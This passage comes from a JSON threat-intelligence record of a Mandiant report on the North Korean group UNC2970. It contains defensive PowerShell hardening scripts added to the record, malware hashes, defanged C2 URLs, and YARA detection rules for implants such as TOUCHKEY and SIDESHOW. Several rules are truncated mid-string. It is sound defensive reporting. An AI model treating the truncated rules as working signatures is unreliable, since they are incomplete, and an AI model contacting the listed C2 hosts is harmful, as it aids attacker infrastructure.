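function Invoke-AdminConditionalAccessRollout {
    param([switch]$Apply)
    if (-not $Apply) {
        # Dry run: print the request bodies for review; nothing touches the tenant.
        New-TrustedLocationBody | ConvertTo-Json -Depth 10
        New-AdminDevicePolicyBody | ConvertTo-Json -Depth 10
        New-AdminLocationBlockPolicyBody -TrustedLocationId 'PLACEHOLDER-NAMED-LOCATION-ID' | ConvertTo-Json -Depth 10
        return
    }
    Connect-MgGraph -Scopes 'Policy.ReadWrite.ConditionalAccess', 'Policy.Read.All'
    $loc = New-MgIdentityConditionalAccessNamedLocation -BodyParameter (New-TrustedLocationBody)
    New-MgIdentityConditionalAccessPolicy -BodyParameter (New-AdminDevicePolicyBody) | Out-Null
    New-MgIdentityConditionalAccessPolicy -BodyParameter (New-AdminLocationBlockPolicyBody -TrustedLocationId $loc.Id) | Out-Null
    # Read back what was created; both stay report-only until you change their state.
    Get-MgIdentityConditionalAccessPolicy -Filter 'startswith(displayName,''CA-ADM-'')' | Select-Object DisplayName, State
}

Invoke-AdminConditionalAccessRollout   # dry run; re-run with -Apply once the bodies have been reviewed
```

Both policies are created in report-only state so the report-only results in the sign-in logs can be reviewed before anything is enforced; the break-glass exclusion is what keeps a mistyped condition from locking every administrator out of the tenant.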
Microsoft has more information on leveraging CAPs to control access to cloud apps.\r\nAzure Identity Protection: Azure Identity Protection is a security feature within Azure Active Directory that allows organizations to automate the detection and remediation of identity-based risks. Identity Protection analyzes user account activity as well as sign-in activity to identify potentially compromised accounts or unauthorized authentication requests. Identity Protection data can be used to enhance Conditional Access Policies by enforcing access controls based on user or sign-in risk. Additionally, Identity Protection risk data should be exported to a Security Information and Event Management (SIEM) solution for further correlation and analysis. Note: Azure Identity Protection requires an Azure AD Premium P2 license.\r\nMulti Admin Approval with Intune: To prevent unauthorized changes, organizations using Intune should implement the Multi Admin Approval feature. This feature enforces a multiple-administrator approval process that requires a second admin's approval before script and app deployments are created or modified. Note: As of February 2023, Multi Admin Approval is in Public Preview and does not yet support request notifications, so requests need to be communicated manually to expedite the approval workflow. Microsoft has more information regarding Multi Admin Approval.\r\nAdditional Security Controls\r\nBlock Office Macros: While Microsoft has changed the default behavior of Office applications to block macros in files from the internet, Mandiant still recommends that organizations proactively deploy policies to control and enforce how Office handles files containing macros. 
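The three endpoint controls in this subsection (the macro policy above, plus the disk-image auto-mount removal and the enhanced PowerShell logging described in the next two items) applied by one added PowerShell script, not code from the Mandiant post. The Office and PowerShell values are the registry values the corresponding Group Policy settings write; the Windows.IsoFile and Windows.VhdFile ProgIDs (assumed to be the shell handlers for .iso/.img and .vhd/.vhdx on Windows 10 and 11) and the transcript directory are assumptions. Run it elevated; -WhatIf previews every change, and the last function reads the values back as a drift check:

```powershell
# Added example (not Mandiant's code): endpoint hardening for the three controls in this section.
# Office macro and PowerShell logging values are the documented policy registry values; the
# Windows.IsoFile / Windows.VhdFile ProgIDs are assumed to own the .iso/.img/.vhd/.vhdx Mount verb.
[CmdletBinding(SupportsShouldProcess)]
param([string]$TranscriptDir = 'C:\\ProgramData\\PSTranscripts')   # assumed transcript location

$OfficeApps   = @('Word', 'Excel', 'PowerPoint', 'Access')
$ImageProgIds = @('Windows.IsoFile', 'Windows.VhdFile')
$PsPolicy     = 'HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell'   # Windows PowerShell 5.1 policy hive

function Set-PolicyValue {
    [CmdletBinding(SupportsShouldProcess)]
    param([string]$Path, [string]$Name, $Value, [string]$Type = 'DWord')
    if ($PSCmdlet.ShouldProcess($Path + ' : ' + $Name, 'set to ' + $Value)) {
        if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
        New-ItemProperty -Path $Path -Name $Name -Value $Value -PropertyType $Type -Force | Out-Null
    }
}

function Disable-OfficeMacros {
    # Per-user Office policy hive (these are User Configuration policies; push them by GPO/Intune at scale).
    # VBAWarnings 4 = disable all macros without notification; the second value blocks Mark-of-the-Web content.
    foreach ($app in $OfficeApps) {
        $sec = 'HKCU:\\Software\\Policies\\Microsoft\\Office\\16.0\\' + $app + '\\Security'
        Set-PolicyValue -Path $sec -Name 'VBAWarnings' -Value 4
        Set-PolicyValue -Path $sec -Name 'blockcontentexecutionfrominternet' -Value 1
    }
}

function Disable-DiskImageMount {
    [CmdletBinding(SupportsShouldProcess)]
    param()
    # Deleting the mount verb removes both the context-menu Mount entry and double-click auto-mount.
    # The key is exported first so the change can be reverted with reg.exe import.
    foreach ($progId in $ImageProgIds) {
        $key = 'Registry::HKEY_CLASSES_ROOT\\' + $progId + '\\shell\\mount'
        if (-not (Test-Path $key)) { continue }
        if ($PSCmdlet.ShouldProcess($key, 'export and delete mount verb')) {
            reg.exe export ('HKCR\\' + $progId + '\\shell\\mount') (Join-Path $env:ProgramData ($progId + '-mount.reg')) /y | Out-Null
            Remove-Item -Path $key -Recurse -Force
        }
    }
}

function Enable-PowerShellLogging {
    # Script block logging (event ID 4104), module logging for all modules, and transcripts with
    # invocation headers: the same values the Group Policy settings write.
    Set-PolicyValue -Path ($PsPolicy + '\\ScriptBlockLogging') -Name 'EnableScriptBlockLogging' -Value 1
    Set-PolicyValue -Path ($PsPolicy + '\\ModuleLogging') -Name 'EnableModuleLogging' -Value 1
    Set-PolicyValue -Path ($PsPolicy + '\\ModuleLogging\\ModuleNames') -Name '*' -Value '*' -Type 'String'
    Set-PolicyValue -Path ($PsPolicy + '\\Transcription') -Name 'EnableTranscripting' -Value 1
    Set-PolicyValue -Path ($PsPolicy + '\\Transcription') -Name 'EnableInvocationHeader' -Value 1
    Set-PolicyValue -Path ($PsPolicy + '\\Transcription') -Name 'OutputDirectory' -Value $TranscriptDir -Type 'String'
}

function Test-EndpointHardening {
    # Read-back check, one boolean per control, so drift can be reported by an endpoint agent.
    $macroGaps = foreach ($app in $OfficeApps) {
        $v = (Get-ItemProperty -Path ('HKCU:\\Software\\Policies\\Microsoft\\Office\\16.0\\' + $app + '\\Security') -ErrorAction SilentlyContinue).VBAWarnings
        if ($v -ne 4) { $app }
    }
    $mountVerbs = $ImageProgIds | Where-Object { Test-Path ('Registry::HKEY_CLASSES_ROOT\\' + $_ + '\\shell\\mount') }
    $sbl = (Get-ItemProperty -Path ($PsPolicy + '\\ScriptBlockLogging') -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    $tr  = (Get-ItemProperty -Path ($PsPolicy + '\\Transcription') -ErrorAction SilentlyContinue).EnableTranscripting
    [pscustomobject]@{
        MacrosBlocked      = (@($macroGaps).Count -eq 0)
        ImageMountRemoved  = (@($mountVerbs).Count -eq 0)
        ScriptBlockLogging = ($sbl -eq 1)
        Transcription      = ($tr -eq 1)
    }
}

Disable-OfficeMacros
Disable-DiskImageMount
Enable-PowerShellLogging
Test-EndpointHardening
```

Two things to keep in mind when using it: PowerShell 7 reads its own PowerShellCore policy hive unless it is configured to fall back to the Windows PowerShell settings, so the logging values above only cover 5.1 by themselves; and removing the shell verb stops Explorer from mounting images but not Mount-DiskImage or other programmatic mounts, so the registry change belongs alongside mail and web filtering of image-file attachments rather than in place of it.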
Microsoft has more information on using policies to manage how Office handles macros.\r\nDisable Disk Image Auto-Mount: Mandiant has observed UNC2970 use trojanized ISO files containing malicious payloads to bypass security controls and trick victims into executing malware. On Windows systems, the option to mount an ISO by right-clicking the file and selecting “Mount” from the context menu can be removed by deleting the registry keys associated with the image file types (.iso, .img, .vhd, .vhdx). Deleting these registry keys also prevents a user from auto-mounting an image file by double-clicking it. Note that this removes only the Explorer shell verb; programmatic mounts such as Mount-DiskImage still work, so pair it with filtering of image-file attachments at the mail and web gateways.\r\nEnhance PowerShell Logging: Increase PowerShell logging to give security engineers and investigators the visibility needed to detect malicious activity and a historical record of how PowerShell was used on systems. For additional details on enhancing PowerShell logging, see the Mandiant blog post “Greater Visibility Through PowerShell Logging”.\r\nIndicators of Compromise\r\nIOC (MD5 hash or C2 URL) Signature\r\ne97b13b7e91edeceeac876c3869cc4eb PLANKWALK\r\na9e30c16df400c3f24fc4e9d76db78ef PLANKWALK\r\nf910ffb063abe31e87982bad68fd0d87 PLANKWALK\r\n30358639af2ecc217bbc26008c5640a7 LIDSHIFT\r\n41dcd8db4371574453561251701107bc LIDSHOT\r\n866f9f205fa1d47af27173b5eb464363 TOUCHSHIFT\r\n8c597659ede15d97914cb27512a55fc7 TOUCHSHIFT\r\na2109276dc704dedf481a4f6c8914c6e TOUCHSHIFT\r\n3bf748baecfc24def6c0393bc2354771 TOUCHSHOT\r\n91b6d6efa5840d6c1f10a72c66e925ce TOUCHKEY\r\n300103aff7ab676a41e47ec3d615ba3f HOOKSHOT\r\n49425d6dedb5f88bddc053cc8fd5f0f4 TOUCHMOVE\r\nabd91676a814f4b50ec357ca1584567e SIDESHOW\r\n05b6f459be513bf6120e9b2b85f6c844 CLOUDBURST\r\nhxxp://webinternal.anyplex[.]com/images/query_image.jsp PLANKWALK 
C2\r\nhxxp://www.fainstec[.]com/assets/js/jquery/jquery.php PLANKWALK C2\r\nhxxps://ajayjangid[.]in/js/jquery/jquery.php PLANKWALK C2\r\nhxxps://sede.lamarinadevalencia[.]com/tablonEdictal/layout/contentLayout.jsp PLANKWALK C2\r\nhxxps://leadsblue[.]com/wp-content/wp-utility/index.php LIDSHOT C2\r\nhxxps://toptradenews[.]com/wp-content/themes/themes.php SIDESHOW C2\r\nhxxp://mantis.quick.net[.]pl/library/securimage/index.php SIDESHOW C2\r\nhxxp://www.keewoom.co[.]kr/prod_img/201409/prod.php SIDESHOW C2\r\nhxxp://abba-servicios[.]mx/wordpress/wp-content/themes/config.php SIDESHOW C2\r\nhxxp://www.ruscheltelefonia[.]com.br/public/php/index.php SIDESHOW C2\r\nhxxps://olidhealth[.]com/wp-includes/php-compat/compat.php CLOUDBURST C2\r\nhxxps://doug[.]org/wp-includes/admin.php CLOUDBURST C2\r\nhxxps://crickethighlights[.]today/wp-content/plugins/contact.php CLOUDBURST C2\r\nMandiant Security Validation Actions\r\nOrganizations can validate their security controls using the following actions with Mandiant Security Validation.\r\nVID Name\r\nA105-491 Command and Control - QUESTDOWN, Exfiltration, Variant #1\r\nA105-492 Command and Control - QUESTDOWN, Exfiltration, Variant #2\r\nA105-493 Command and Control - QUESTDOWN, Next Stage Download Attempt, Variant #1\r\nA105-494 Command and Control - QUESTDOWN, Status, Variant #1\r\nA105-507 Phishing Email - Malicious Attachment, PLANKWALK Downloader, Variant #1\r\nA105-508 Phishing Email - Malicious Attachment, QUESTDOWN Dropper, Variant #1\r\nA105-514 Protected Theater - QUESTDOWN, Execution, Variant #1\r\nS100-218 Malicious Activity Scenario - Campaign 22-046, QUESTDOWN Infection\r\nSignatures\r\nPLANKWALK\r\nrule M_Hunt_APT_PLANKWALK_Code_String {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects a format string containing code and 
token found in PLANKWALK\"\r\n    strings:\r\n        $hex = { 63 6F 64 65 [1-6] 3D 25 64 26 [1-6] 75 73 65 72 [1-6] 3D 25 73 26 [1-6] 74 6F 6B 65 }\r\n    condition:\r\n        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and $hex\r\n}\r\nLIDSHIFT\r\nrule M_APT_Loader_Win_LIDSHIFT_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects LIDSHIFT implant\"\r\n    strings:\r\n        $anchor1 = \"%s:%s:%s\" ascii\r\n        $encloop = { 83 ?? 3F 72 ?? EB ?? 8D ?? ?? B8 ?? 41 10 04 F7 ?? 8B ?? 2B ?? D1 ?? 03 ?? C1 ?? 05 6B ?\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them\r\n}\r\nLIDSHOT\r\nrule M_APT_Loader_Win_LIDSHOT_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects LIDSHOT implant\"\r\n    strings:\r\n        $code1 = { 4C 89 6D ?? 4C 89 6D ?? C7 45 ?? 01 23 45 67 C7 45 ?? 89 AB CD EF C7 45 ?? FE DC BA 98 C7 45\r\n        $code2 = { B8 1F 85 EB 51 41 F7 E8 C1 FA 03 8B CA C1 E9 1F 03 D1 6B CA 19 }\r\n        $code3 = { C7 45 ?? 30 6B 4C 6C 66 C7 45 ?? 55 00 }\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them\r\n}\r\nCLOUDBURST\r\nrule M_APT_Loader_Win_CLOUDBURST_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n    strings:\r\n        $anchor1 = \"Microsoft Enhanced Cryptographic Provider v1.0\" ascii wide\r\n        $code1 = { 74 79 70 }\r\n        $code2 = { 65 71 75 69 }\r\n        $code3 = { 62 6F 78 69 }\r\n        $code4 = { E8 ?? ?? ?? ?? 
FF C6 B8 99 99 99 99 F7 EE D1 FA 8B C2 C1 E8 1F 03 D0 8D 04 16 8D 34 90 85 F6 75\r\n        $str1 = \"%s%X\"\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them\r\n}\r\nTOUCHSHIFT\r\nrule M_DropperMemonly_TOUCHSHIFT_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting rule for TOUCHSHIFT\"\r\n    strings:\r\n        $p00_0 = {0943??eb??ff43??b0??eb??e8[4]c700[4]e8[4]32c0}\r\n        $p00_1 = {4c6305[4]ba[4]4c8b0d[4]488b0d[4]ff15[4]4c6305[4]ba[4]4c8b0d[4]488b0d}\r\n    condition:\r\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n        (\r\n            ($p00_0 in (70000..90000) and $p00_1 in (0..64000))\r\n        )\r\n}\r\nSIDESHOW\r\nrule M_APT_Backdoor_Win_SIDESHOW_1 {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Detects string deobfuscation function in SIDESHOW, may also detect other variants of\r\n    strings:\r\n        $code1 = { 41 0F B6 ?? 33 ?? 48 ?? ?? 0F 1F 80 00 00 00 00 3A ?? 74 ?? FF ?? 48 FF ?? 83 ?? 48 72 ??\r\n    condition:\r\n        uint16(0) == 0x5a4d and (all of them)\r\n}\r\nTOUCHKEY\r\nrule M_Hunting_TOUCHKEY {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting rule For TOUCHKEY\"\r\n    strings:\r\n        $a1 = \"Normal.dost\"\r\n        $a2 = \"Normal.docb\"\r\n        $c1 = \"[SELECT]\" ascii wide\r\n        $c2 = \"[SLEEP]\" ascii wide\r\n        $c3 = \"[LSHIFT]\" ascii wide\r\n        $c4 = \"[RSHIFT]\" ascii wide\r\n        $c5 = \"[ENTER]\" ascii wide\r\n        $c6 = \"[SPACE]\" ascii wide\r\n    condition:\r\n        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550\r\n        and filesize \u003c 200KB and (5 of ($c*)) and $a1 and $a2\r\n}\r\nTOUCHSHOT\r\nrule M_Hunting_TOUCHSHOT {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting rule For TOUCHSHOT\"\r\n    strings:\r\n        $path = \"%s\\\\Microsoft\\\\Windows\\\\Themes\\\\\" wide\r\n        $format = \"%04d%02d%02d-%02d%02d%02d\"\r\n        $s1 = \"EnumDisplaySettingsExW\" ascii\r\n        $s2 = \"GetSystemMetrics\" ascii\r\n        $s3 = \"GetDC\" ascii\r\n        $s5 = \"ReleaseDC\" 
ascii\r\n    condition:\r\n        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550\r\n        and filesize \u003c 200KB and (3 of ($s*)) and $path and $format\r\n}\r\nHOOKSHOT\r\nrule M_Hunting_HOOKSHOT {\r\n    meta:\r\n        author = \"Mandiant\"\r\n        description = \"Hunting rule for HOOKSHOT\"\r\n    strings:\r\n        $p00_0 = {8bb1[4]408873??85f675??488b81[4]488b88[4]4885c974??e8}\r\n        $p00_1 = {8bf3488bea85db0f84[4]4c8d2d[4]66904c8d4424??8bd6488bcd}\r\n    condition:\r\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n        (\r\n            ($p00_0 in (470000..490000) and $p00_1 in (360000..380000))\r\n        )\r\n}\r\nAcknowledgements\r\nSpecial thanks to John Wolfram, Rich Reece, Colby Lahaie, Dan Kelly, Joe Pisano, Jeffery Johnson, Fred Plan, Omar ElAhdan, Renato Fontana, Daniel Kennedy, and all the members of Mandiant Intelligence and Consulting that supported these investigations. We would also like to thank Lexie Aytes for creating Mandiant Security Validation (MSV) actions, as well as Michael Barnhart, Jake Nicastro, Geoff Ackerman, and Dan Perez for their technical review and feedback.\r\nPosted in\r\nThreat Intelligence\r\nSource: https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970"
	],
	"report_names": [
		"lightshow-north-korea-unc2970"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3",
				"Black Artemis",
				"COVELLITE",
				"CTG-2460",
				"Citrine Sleet",
				"Diamond Sleet",
				"Guardians of Peace",
				"HIDDEN COBRA",
				"High Anonymous",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit",
				"UNC577",
				"Who Am I?",
				"Whois Team",
				"ZINC"
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "c1eadfd8-6e9c-4024-902d-555c9530fcea",
			"created_at": "2023-01-06T13:46:38.645834Z",
			"updated_at": "2026-04-10T02:00:03.04985Z",
			"deleted_at": null,
			"main_name": "TEMP.Hermit",
			"aliases": [],
			"source_name": "MISPGALAXY:TEMP.Hermit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006",
				"Daserf",
				"Stalker Panda",
				"Swirl Typhoon",
				"Tick"
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a2dd0e8-beea-415c-b90d-4df9da8358ae",
			"created_at": "2024-09-20T02:00:04.575485Z",
			"updated_at": "2026-04-10T02:00:03.695726Z",
			"deleted_at": null,
			"main_name": "UNC2970",
			"aliases": [],
			"source_name": "MISPGALAXY:UNC2970",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd",
			"created_at": "2022-10-25T16:07:23.766784Z",
			"updated_at": "2026-04-10T02:00:04.7432Z",
			"deleted_at": null,
			"main_name": "Bluenoroff",
			"aliases": [
				"APT 38",
				"ATK 117",
				"Alluring Pisces",
				"Black Alicanto",
				"Bluenoroff",
				"CTG-6459",
				"Copernicium",
				"G0082",
				"Nickel Gladstone",
				"Sapphire Sleet",
				"Selective Pisces",
				"Stardust Chollima",
				"T-APT-15",
				"TA444",
				"TAG-71",
				"TEMP.Hermit"
			],
			"source_name": "ETDA:Bluenoroff",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434939,
	"ts_updated_at": 1775792300,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.pdf",
		"text": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.txt",
		"img": "https://archive.orkl.eu/2a3132b356393fb5ac433f1b17f2d59aff8341d2.jpg"
	}
}